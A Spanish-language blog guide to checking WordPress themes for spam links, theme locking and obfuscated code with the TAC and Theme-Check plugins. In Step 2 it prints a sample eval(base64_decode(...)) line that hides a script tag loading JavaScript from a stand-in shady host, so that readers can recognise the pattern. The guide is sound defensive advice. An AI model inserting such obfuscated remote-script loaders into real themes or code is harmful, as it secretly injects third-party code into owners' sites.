Cómo asegurarse de que su tema de WordPress no sea sospechoso

Todavía puedo recordar lo emocionado que estaba en 2008 cuando descubrí WordPress por primera vez (que lo adoptó tardíamente, lo sé).

Lo que fue particularmente impresionante para mí fue que podía cambiar los diseños de mis sitios de WordPress con un mínimo esfuerzo.

¡Y así comenzó la búsqueda del tema perfecto!

Por lo que puedo recordar, no había tantos temas pagados / premium en ese entonces. Y, para ser honesto, ni siquiera estaba tomando en consideración la posibilidad de pagar por un tema (ya que el dinero era un poco escaso), así que estaba un poco atrapado con temas gratuitos por defecto.

Todo estuvo bien por un tiempo. Mis sitios de prueba y blogs personales funcionaban bien, hasta que, un día, noté algunos enlaces extraños en el pie de página.

Esos enlaces inusuales apuntaban no solo al sitio del creador del tema, sino también a algunos sitios cuestionables que tenían textos de anclaje fraudulentos como «préstamo de día de pago», «seguro de hogar barato», «servicios de SEO», etc.

No hay problema, Pensé, quitarlos solo debería tomar un minuto.

Pero, para mi sorpresa, esos enlaces no estaban ni en la pantalla de Widgets del tema ni en ninguna parte del código fuente del tema.

Busqué todos los archivos del tema a granel con un editor de código fuente, buscando esos textos de anclaje.

Incluso revisé la base de datos usando un SQL SELECT declaración.

Nada.

Entonces, ¿cómo fue posible que estos enlaces permanecieran bajo el radar?

Bueno, resulta que esta es la historia de mi primer encuentro con el código cifrado en los temas de WordPress.

Prácticas sospechosas de temas de WordPress

El código cifrado es solo una pieza del rompecabezas; Hay otras prácticas desagradables de desarrollo de temas de WordPress.

Enlaces estáticos que apuntan a sitios web sospechosos

No todos los enlaces estáticos (o enlaces incrustados) en los temas de WordPress son malos.

Muchas veces, son solo enlaces que reconocen al desarrollador del tema. Siempre que los enlaces sean decentes, y siempre que se informe al usuario del tema que los enlaces se mostrarán en su sitio, es posible que estén bien.

Sin embargo, en algunos casos, pueden dirigirse a sitios web con spam. Cuando los enlaces comienzan a apuntar a sitios de casinos, farmacias en línea o algunos productos de negocios turbios, todo sin el conocimiento del propietario del sitio, entonces es una historia diferente.

Los motores de búsqueda simplemente no estarán contentos de descubrir que su sitio está enlazado al lado oscuro de Internet, y pueden penalizarlo por ello incluso si es un participante involuntario.

Bloqueo de tema

Algunos enlaces y bloques de código en temas turbios de WordPress están «bloqueados» con JavaScript y / o PHP. La eliminación de estos enlaces o bloques de código hará que todo el sitio de WordPress se quede en blanco, desplazando su contenido con un mensaje que le indica que debe volver a colocar los enlaces / bloques de código para poder eliminar el mensaje de su sitio.

Codigo encriptado

El código cifrado es un término en la comunidad de WordPress para los fragmentos de código que se están ofuscando deliberadamente al usuario del tema. La intención del código cifrado es ocultar partes del código fuente del tema y hacer que estas partes sean difíciles de eliminar. El código cifrado puede hacer una variedad de cosas, como generar enlaces a sitios de terceros e interferir con la experiencia del usuario.

Por que estas cosas estan pasando

Algunas empresas hacen todo lo posible para incluir elementos dañinos en sus temas de WordPress.

¿Por qué harían esto? Podrías preguntar. Porque los temas de WordPress son una gran herramienta de marketing online.

El mercado de temas sigue creciendo año tras año. Se ha informado que el 18,9 por ciento de todos los sitios están construidos con WordPress. Y, en un momento dado, todos los propietarios de sitios saldrán a buscar temas agradables.

La forma en que algunas personas aprovechan esta oportunidad es creando un tema de WordPress de excelente apariencia y luego incluyendo enlaces ocultos y código ofuscado en el tema.

Imagínese cómo podría ser su alcance si consiguen incluso unos pocos cientos de dominios instalando su tema.

Cómo asegurarse de que está usando un tema confiable

Si está considerando el uso de un nuevo tema de WordPress, a continuación se muestran algunos pasos que pueden ayudarlo a no meterse en problemas.

Por supuesto, la primera mejor opción es utilizar un tema obtenido de una fuente confiable y creado por un desarrollador de temas confiable, los cuales pueden reducir significativamente el potencial de estas prácticas turbias que se emplean. No estaría de más seguir estos pasos a pesar de la reputación de su tema candidato.

Paso 1: instale complementos de verificación de temas

Es muy posible investigar cada tema a mano con solo revisar sus archivos. Pero hacerlo con un complemento confiable es mucho más rápido y potencialmente más completo.

Necesitará dos complementos para este paso.

  1. TAC analiza todos los temas de WordPress instalados en busca de códigos potencialmente maliciosos.
  2. Comprobación de tema prueba sus temas para que cumplan con los últimos estándares y mejores prácticas de WordPress.

Paso 2: prueba el tema en busca de código encriptado

Antes de activar un tema de WordPress, primero debe probarlo en un entorno de desarrollo seguro. Uno de esos entornos está en su PC. Sin embargo, si no tiene tiempo para eso, debería estar bien siempre y cuando no active el tema antes de ejecutar sus pruebas.

Para ver lo que el complemento TAC tiene que decir sobre su nuevo tema, en la pantalla de administración de WordPress, vaya a Apariencia> TAC.

Desplácese hacia abajo hasta su tema para ver si hay algún problema.

Captura de pantalla del resultado de una prueba TAC.

Si TAC dice que todo está bien (y estás usando un tema de una fuente confiable), probablemente lo esté.

Sin embargo, si indica la presencia de algún código cifrado, debe tener cuidado.

Se recomienda no utilizar nunca temas que tengan código cifrado. La razón principal de esto es que no tienes absolutamente ningún control sobre lo que hay dentro del bloque de código cifrado. Puede ser cualquier cosa: scripts de terceros, minería de datos, anuncios, esquemas de construcción de enlaces, etc.

Algunas funciones de PHP y JavaScript asociadas con el código cifrado están diseñadas para ayudar a los desarrolladores a realizar procesos difíciles pero benignos, como la conversión o el análisis de la codificación de datos. Pero en las manos equivocadas, y en el contexto del desarrollo de temas de WordPress, a menudo se utilizan para ocultar el código fuente sospechoso.

Si desea husmear un poco por su cuenta, puede buscar archivos de tema por lotes con un editor de texto como Notepad ++. Busque la palabra clave «base64_decode».

La base64_decode() Función PHP, junto con la eval() función, se utiliza comúnmente para ejecutar código cifrado.

Por ejemplo, si el código cifrado que encuentra se parece a esto (solo un ejemplo, no un código real), manténgase alejado:

$o="eHQvamF2YXNjcmlwdCI+PC9zY3JpcHQ+";
eval(base64_decode("PHNjcmlwdCBzcmM9Ii8vYS1zaGFkeS1zaXRlLmNvbS9qcy9zcGFtbGlua3MuanMiIHR5cGU9InRl" . $o));

Paso 3: evalúe todos los enlaces estáticos

TAC también le avisará cuando encuentre algún enlace estático dentro del tema. Cuando haces clic en el Detalles , verá los archivos y líneas exactos donde se encuentran esos enlaces.

Encuentre enlaces estáticos integrados con TAC.

Los enlaces estáticos son comunes en los temas gratuitos de WordPress y no son necesariamente malos. Por ejemplo, algunos temas requieren atribución. Lo primero que debe hacer es decidir si está de acuerdo o no con que esos enlaces estén en su sitio. Al final, si no está de acuerdo con algún enlace, simplemente no debería usar el tema.

Cuando se trata de enlaces estáticos, la mayor parte del tiempo la fiesta se desarrolla en el footer.php expediente.

Por ejemplo, el tema que verifiqué cuando investigaba para esta pieza tenía enlaces que apuntaban a un sitio titulado «Botox Tel Aviv» con un texto de anclaje que constaba en su totalidad de caracteres no latinos:

Un ejemplo de un enlace estático incrustado en un tema de WordPress.

Con fines de prueba, puede verificar qué sucede si elimina un enlace incrustado. A veces, descubrirá que todo su sitio dejará de funcionar como resultado de esta acción. Y eso es exactamente lo que le sucedió a mi sitio de prueba; cuando eliminé el enlace, el sitio dejó de funcionar y el contenido se reemplazó con este mensaje:

El mensaje que se muestra en todas las páginas cuando se elimina un enlace estático.

Si desea investigar un poco más, aquí es donde entra en juego el otro complemento, Theme-Check.

Ir Apariencia> Comprobación de tema y ejecute una prueba para el tema en cuestión. Lo más probable es que el complemento informe muchas cosas, por lo que tendrá que navegar por un tiempo para encontrar qué podría estar causando los problemas.

En mi caso, las instrucciones que se encuentran en la línea 124 del functions.php archivo fueron los culpables:

Verificación de tema para encontrar un error de tema de WordPress.

Conclusión

La moraleja de la historia es que debes elegir los temas de WordPress con cuidado. Antes de usar cualquier tema, es mejor investigar un poco y probarlo.

contenido relacionado

Deja un comentario